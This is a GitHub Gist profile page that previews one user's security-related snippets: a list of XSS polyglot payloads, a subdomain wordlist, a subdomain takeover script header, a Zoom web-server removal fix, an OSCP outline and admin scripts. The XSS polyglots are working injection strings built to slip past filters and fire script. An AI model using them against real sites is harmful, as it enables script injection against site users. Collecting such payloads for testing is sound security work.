Skip to content

Instantly share code, notes, and snippets.

View test.svg
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
View test.svg
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
View keybase.md

Keybase proof

I hereby claim:

  • I am wellr00t3d on github.
  • I am wellr00t3d (https://keybase.io/wellr00t3d) on keybase.
  • I have a public key ASDm-BJAFHLhryWdjcHLMcGnL2ZX-oMCToBKUVL5VAHCWQo

To claim this, I am signing this object:

@wellr00t3d
wellr00t3d / xss-polyglots.txt
Last active Oct 9, 2019 — forked from michenriksen/xss-polyglots.txt
XSS Polyglot payloads
View xss-polyglots.txt
jaVasCript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
javascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`
javascript:"/*'//`//\"//</template/</title/</textarea/</style/</noscript/</noembed/</script/--><script>/<i<frame */ onload=alert()//</script>
javascript:"/*`/*\"/*'/*</stYle/</titLe/</teXtarEa/</nOscript><
@wellr00t3d
wellr00t3d / all.txt
Created Oct 5, 2019 — forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
View all.txt
This file has been truncated, but you can view the full file.
.
..
........
@
*
*.*
*.*.*
🐎
@wellr00t3d
wellr00t3d / second-order.py
Created Oct 2, 2019 — forked from PatrikHudak/second-order.py
Second-order subdomain takeover
View second-order.py
# coding=utf-8
# python3
from urllib.parse import urlparse
import requests
import urllib3
from bs4 import BeautifulSoup
@wellr00t3d
wellr00t3d / zoom_fix.md
Created Jul 10, 2019 — forked from karanlyons/ZoomDaemon.yara
Fix for Unexpected Zoom Behavior
View zoom_fix.md

If you're using macOS, run these commands:

pkill "ZoomOpener"; rm -rf ~/.zoomus; touch ~/.zoomus && chmod 000 ~/.zoomus;
pkill "RingCentralOpener"; rm -rf ~/.ringcentralopener; touch ~/.ringcentralopener && chmod 000 ~/.ringcentralopener;

These two commands do the same thing for the two most popular "brands" of Zoom (Zoom, and RingCentral). They first kill the hidden server if it is running, and then regardless deletes it from its hidden directory if it exists there. Finally they create an empty file

@wellr00t3d
wellr00t3d / gfid-resolver.sh
Created Oct 2, 2018 — forked from louiszuckerman/gfid-resolver.sh
Glusterfs GFID Resolver Turns a GFID into a real path in the brick
View gfid-resolver.sh
#!/bin/bash
if [[ "$#" < "2" || "$#" > "3" ]]; then
cat <<END
Glusterfs GFID resolver -- turns a GFID into a real file path
Usage: $0 <brick-path> <gfid> [-q]
<brick-path> : the path to your glusterfs brick (required)
View how-to-oscp-final.md

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

@wellr00t3d
wellr00t3d / update_checker.sh
Created May 15, 2018
checks for drupal updates
View update_checker.sh
#!/bin/bash
DRUPALSITES=`find /var/www -name default.settings.php | grep -i '/htdocs/' 2> "/dev/null"`
for site in $DRUPALSITES; do
value=`echo $site | sed -e "s/\/sites\/default\/default.settings.php//"`
echo $value
echo
DRUSHOUTPUT=`/usr/bin/php /opt/scripts/drush/drush.php --root=$value up -n 2>&1 | grep -E '(SECURITY|not supported)'`
echo $DRUSHOUTPUT